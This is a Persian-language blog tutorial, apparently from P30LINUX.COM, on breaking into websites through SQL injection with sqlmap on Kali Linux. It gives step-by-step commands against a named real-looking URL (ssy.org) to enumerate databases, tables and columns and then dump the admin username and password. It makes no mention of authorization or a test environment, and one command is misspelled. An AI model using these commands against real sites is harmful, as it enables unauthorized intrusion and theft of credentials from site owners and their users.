آموزش نفوذ به سایت با باگ SQL

//آموزش نفوذ به سایت با باگ SQL

آموزش نفوذ به سایت با باگ SQL

خب قبل از آموزش یه توضیح درباره این باگ بدم که ببینیم اصلا چی هستش و چه بلایی می تونن سرمون بیارن با این باگ SQL

از پیدایش پایگاه داده ها برای ذخیره اطلاعات در وب سایت باگی کشف شد به نام SQL Injection و اهمیت این باگ آنقدر بالاست که اگر سایت شما حاوی این باگ باشید باید بگوییم عملا همه چیز سایت شما در دست هکرهاست.

چرا که تمامی اطلاعات شما درون دیتابیس ذخیره می شود، یوزرنیم و پسورد ادمین سایت، کاربران، لایسنس ها و … ترسناکه نه!

خب میریم سراغ آموزش

ما با برنامه sqlmap کالی لینوکس کار می کنیم اگر در لینوکس های دیگر این برنامه را ندارید می توانید از سایت Github دانلودش کنید

در کالی این برنامه در Applications > web application analysis می توانید پیدا کنید و راه دیگر با باز کردین ترمینال و فراخوانی با sqlmap می باشد.

sqlmap -u (url address) --dbs
sqlmap -u http://ssy.org/main.php?id=22 --dbs

در طول پروسه هرچی اومد شما yes را بزنید y

بعد از اسکن که ممکن است به طول بی انجامد با دیتابیس های سایت مواجه میشم که ممکن است دیتابیس هر سایت متفاوت باشد

خب در دیتابیس اولی (information-schema) هیچ وقت نمی تونه باشه چون اطلاعاتی مثل مشخصات قالب و متن های سایت داره مگر اینکه مدیر سایت عوض کرده باشه که خیلی کم پیش میاد

خب ما با دومی شروع می کنیم (شما درصورت موفق نشدن در دیتابیس اولی باید بقیه دیتابیس ها را هم نگاه بندازید) با دستور زیر تیبل های دیتابیس را می بینیم:

sqlmap -u (url address) -D (DATA BASE) --tables
sqlmap -u http://ssy.org/main.php?id=22 -D ssy_datassy --tabe

خب تمامی table های دیتابیس را به نمایش گذاشت خب شما باید ببینید ممکنه در کدوم تیبل رمز و پسورد باشه خب نام های که مثل user , account , admin , adminator و… هستشو باید بگردید ( مگر اینکه مدیر سایتمون زرنگی کرده باشه اسمشو تغییر داده باشه اونوقت باید کلشو تک تک بگردید مثل عکس زیر تو تیبل های دیتابیس یه کلمه user بین اون همه کلمس :

خب ما الان باید داخل user ببینیم که بدونیم چی داره با دستور زیر:

sqlmap -u (url address) -D (DATA BASE) -T (TABLE) --columns

sqlmap -u http://ssy.org/main.php?id=22 -D ssy_datassy -T user --columns

خب داخل تیبلمون به نمایش گذاشت می بینید که ایمیل – یوزرنیم و رمز را داخلش داره

خب در اینجا فقط ما یوز و رمز و میخواییم با دستور زیر این دو را به نمایش میزاریم:

sqlmap -u (url address) -D (DATA BASE) -T (TABLE) -C (user,password) --dump all
sqlmap -u http://ssy.org/main.php?id=22 -D ssy_datassy -T user -C name,password --dump all

در عکس در دستور کالمز اشتباه رخ داده شما مانند بنده که بالای عکس دستور را نوشتم انجام دهید

در اینجا هم یوزرنیم و رمز ادمین سایت را به نشون داد تمام! 🙂

خب دید که این باگ چقدر خطرناک و چه راحت می توان روی دیتابیس های آن نفوذ انجام داد امیدوارم مفید واقع شده باشه اگر مشکلی برنامه ایجاد شد و خطا بهتون داد زیر همین مطلب می تونید بپرسید

ویدیو هم آپلود کردیم برای یادگیری بهتر :

P30LINUX.COM

توسط |۱۳۹۷/۶/۳۰ ۱۸:۵۰:۳۵شهریور ۳۰ام, ۱۳۹۷|Linux|بدون ديدگاه

درباره نویسنده :

Ehsan
احسان هستم دانشجوی آی تی علاقه ی زیادی به امنیت شبکه دارم امیدوارم بتونم مطالب مفیدی با شما به اشتراک بزارم

ثبت ديدگاه